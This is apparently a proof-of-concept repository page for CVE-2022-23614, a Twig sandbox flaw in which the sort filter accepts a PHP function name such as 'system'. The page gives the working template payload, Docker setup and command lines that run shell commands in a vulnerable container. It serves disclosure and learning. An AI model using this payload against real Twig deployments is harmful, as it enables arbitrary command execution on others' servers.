CVE-2022-23614 PoC — Code injection in Twig

Source

Associated Vulnerability

Description

Proof of concept for CVE-2022-23614 (command injection in Twig)

Readme

# CVE-2022-23614

Proof of concept (PoC) for [CVE-2022-23614](https://nvd.nist.gov/vuln/detail/CVE-2022-23614) referenced in the [DSA-5107-1](https://www.debian.org/security/2022/dsa-5107).

- **CVSS-2.0**: 7.5
- **CVSS-3.X**: 9.8

## Explanation

Twig is a flexible, fast, and secure template engine for PHP. Notably, it is possible to use filters in a template before rendering it. The `sort` filter can be used to sort the elements of an array with the following structure:

```twig
{{ [5,8,2,3]|sort('desc') }}
```

Twig has a sandbox mode to evaluate untrusted template code. When in this sandbox mode, the `arrow` parameter of the `sort` filter must be a closure to avoid attackers being able to run arbitrary PHP functions. In affected versions this constraint was not properly enforced and could lead to code injection of arbitrary PHP code.

```twig
{{ ["id",""]|sort('system') }}
```

## Usage

This PoC illustrates the vulnerability in two different use cases: either using Debian `php-twig` (v2.14.1) package or using Composer `twig/twig` (v2.14) module.

The `index.php` file crafts a Twig template based on the first argument. In the following code, `argv[1]` is the name of the sorting function that will be used by Twig when rendering.

```php
// index.php - line 28
$templateCode .= "{{ args|sort('" . $sortFunction . "') }}\n";
```

Then, `index.php` will use two deprecated functions of Twig to load the generated template. Eventually, it uses the second argument (`argv[2]`) to pass data to the template as it is being rendered, notably the `args` array that we want to sort.

```php
// index.php - line 44
$renderedTemplate = $modifiedTemplate->render($arrayToSort);
```

The rendered template is then printed in the standard output.

> Please note this repository was made for **demonstration purposes only**. It is meant to be simple to understand and easy to use in order to play with the CVE using only a command line interface. It is quite far from what one can find on an actual vulnerable server.

### php-twig

Using Docker, we are able to recreate the context of the original [Debian Security Advisory (DSA)](https://www.debian.org/security/2022/dsa-5107). You can use the given `build-docker.sh` script in order to properly build and run the vulnerable container.

```
chmod a+x build-docker.sh
./build-docker.sh
```

The container should shut down once the payload is executed (an `id` command). If you want to try your own commands, you can run the container in interactive mode:

```
docker build -t cve-2022-23614 .
docker run -it --rm cve-2022-23614 /bin/bash
```

Once in the container, you can craft your own payload using the following model:

```
php index.php system '{"args":["id",""]}'
                ^                 ^
          sorting function   array to sort
```

> This dockerfile was partially created using [DECRET](https://github.com/Orange-OpenSource/decret).

### Composer

If you have php and Composer already installed on your machine, you can replicate the exploit using the vulnerable Composer module.

```
cd exploit
composer install
```

Then you just have to play with the payload.

```
php index.php system '{"args":["id",""]}'
```

---

## References

**CVE details**: https://nvd.nist.gov/vuln/detail/CVE-2022-23614

**DSA**: https://www.debian.org/security/2022/dsa-5107

**Patch commit**: https://github.com/twigphp/Twig/commit/22b9dc3c03ee66d7e21d9ed2ca76052b134cb9e9

**PoC by davwwwx** (using GUI): https://github.com/davwwwx/CVE-2022-23614

File Snapshot

 [4.0K]  /data/pocs/8051fce50292fce7f1634c7d7680d17df6f1cbbd
├── [ 101]  build-docker.sh
├── [ 697]  Dockerfile
├── [4.0K]  exploit
│   ├── [ 181]  composer.json
│   ├── [8.7K]  composer.lock
│   └── [1.4K]  index.php
├── [3.4K]  README.md
└── [ 231]  snapshot.list

1 directory, 7 files

Remarks